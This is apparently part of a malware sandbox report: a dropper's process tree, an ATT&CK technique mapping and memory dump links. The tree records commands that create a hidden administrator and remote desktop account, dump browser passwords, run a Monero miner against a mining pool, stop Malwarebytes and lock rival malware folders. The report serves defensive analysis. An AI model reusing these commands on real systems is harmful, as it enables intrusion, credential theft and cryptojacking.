        10⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        11⤵
        
        PID:848
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        10⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        11⤵
        
        PID:3268
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:4880
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        10⤵
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2620
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        11⤵
        
        PID:4420
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        10⤵
        Executes dropped EXE
        
        PID:2812
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        10⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:2028
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        10⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1932
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        10⤵
        Views/modifies file attributes
        
        PID:4584
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:4880
    - - C:\Programdata\microsoft\intel\MOS.exe
        
        "C:\Programdata\microsoft\intel\MOS.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:4904
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:908
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\R.vbs"
        6⤵
        
        PID:5048
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Programdata\Microsoft\Intel\OS.bat" "
        7⤵
        
        PID:3200
        
        \??\c:\Programdata\Microsoft\Intel\Cheat64.exe
        
        "c:\Programdata\Microsoft\Intel\Cheat64.exe" /qn
        8⤵
        Executes dropped EXE
        
        PID:920
        
        C:\ProgramData\System32\Logs\ShellExperienceHost.exe
        
        C:\ProgramData\System32\Logs\ShellExperienceHost.exe
        9⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        
        PID:4928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x -t 1
        10⤵
        
        PID:4952
        
        C:\ProgramData\WindowsTask\MicrosoftShellHost.exe
        
        C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x -t 1
        11⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:2968
    - - C:\Programdata\microsoft\intel\P.exe
        
        "C:\Programdata\microsoft\intel\P.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:4572
      - C:\programdata\microsoft\rootsystem\P.exe
        
        "C:\programdata\microsoft\rootsystem\P.exe"
        6⤵
        
        PID:4640
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\rootsystem\P.vbs"
        6⤵
        Checks computer location settings
        
        PID:536
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
        7⤵
        
        PID:220
        
        C:\programdata\microsoft\rootsystem\1.exe
        
        C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
        8⤵
        
        PID:4368
    - - C:\Programdata\microsoft\intel\CHStart.exe
        
        "C:\Programdata\microsoft\intel\CHStart.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4552
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\intel\H.bat
        6⤵
        Drops file in Drivers directory
        
        PID:2176
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\intel\Clean.bat
        6⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete swprv
        7⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\net.exe
        
        net stop MinerGate
        7⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MinerGate
        8⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1 /nobreak
        7⤵
        Delays execution with timeout.exe
        
        PID:936
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop MBAMService
        7⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" "John" /add
        8⤵
        
        PID:3624
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete MinerGate
        7⤵
        
        PID:4724
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1 /nobreak
        7⤵
        Delays execution with timeout.exe
        
        PID:1440
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete MBAMService
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4640
        
        C:\Windows\SysWOW64\sc.exe
        
        sc start AppIDSvc
        7⤵
        
        PID:4276
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config AppIDSvc start= Auto
        7⤵
        
        PID:4556
        
        C:\Windows\SysWOW64\sc.exe
        
        sc start AppMgmt
        7⤵
        
        PID:616
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config AppMgmt start= Auto
        7⤵
        
        PID:752
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM CEF.exe /T /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3324
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1 /nobreak
        7⤵
        Delays execution with timeout.exe
        
        PID:3984
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM CEF.exe /T /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2812
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\programdata\Cefunpacked\ /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:1672
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\programdata\Cefunpacked\ /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:2636
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM "Windows System Driver.exe" /T /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1048
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM "Windows Driver.exe" /T /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2920
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM "COM Surrogate.exe" /T /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4232
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM "system.exe" /T /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:956
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM "security.exe" /T /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4280
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1 /nobreak
        7⤵
        Delays execution with timeout.exe
        
        PID:612
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\programdata\WindowsSQL\ /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:208
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\programdata\WindowsSQL\ /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:4064
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\programdata\DirectX11b\ /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:3696
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\programdata\DirectX11b\ /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:2568
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\programdata\Framework\ /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:4176
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\programdata\Framework\ /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:1168
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM AMD.exe /T /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2012
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\users\Admin\AppData\local\AMD\ /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:2688
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\users\Admin\AppData\local\AMD\ /deny system:(OI)(CI)(F
        7⤵
        Modifies file permissions
        
        PID:4592
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM nssm.exe /T /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4164
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM xmarin.exe /T /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4124
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\users\Admin\AppData\Local\xmarin\ /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:4504
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\users\Admin\AppData\Local\xmarin\ /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:5088
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM wupdate.exe /T /F
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2192
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\users\Admin\AppData\Local\wupdate\ /deny Admin:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:4428
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\users\Admin\AppData\Local\wupdate\ /deny system:(OI)(CI)(F)
        7⤵
        Modifies file permissions
        
        PID:4232
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM SIVapp.exe /T /F
        7⤵
        Kills process with taskkill
        
        PID:1928
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Programdata\microsoft\intel\L.bat" "
        5⤵
        
        PID:1100
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        6⤵
        
        PID:3584
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 866
        6⤵
        
        PID:1568
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 12 /nobreak
        6⤵
        Delays execution with timeout.exe
        
        PID:4920
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Programdata\microsoft\intel\fake.vbs"
        5⤵
        
        PID:2368
- C:\programdata\microsoft\intel\TStart.exe
  "C:\programdata\microsoft\intel\TStart.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\Temp\Temp.bat
    3⤵
    PID:1524
  - - C:\Windows\SysWOW64\timeout.exe
      TIMEOUT /T 12 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:4420
  - - C:\Windows\SysWOW64\timeout.exe
      TIMEOUT /T 3 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:4604
  - - C:\Windows\SysWOW64\taskkill.exe
      TASKKILL /IM svchost.exe.exe /T /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3420

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2688

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Hidden Files and Directories

Impair Defenses

Modify Registry

Web Service

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2620-257-0x0000000000400000-0x0000000000553000-memory.dmp

Filesize
1.3MB

Download
memory/2812-258-0x0000000000400000-0x0000000000553000-memory.dmp

Filesize
1.3MB

Download
memory/2968-251-0x00007FFD5ADB0000-0x00007FFD5AFA5000-memory.dmp

Filesize
2.0MB

Download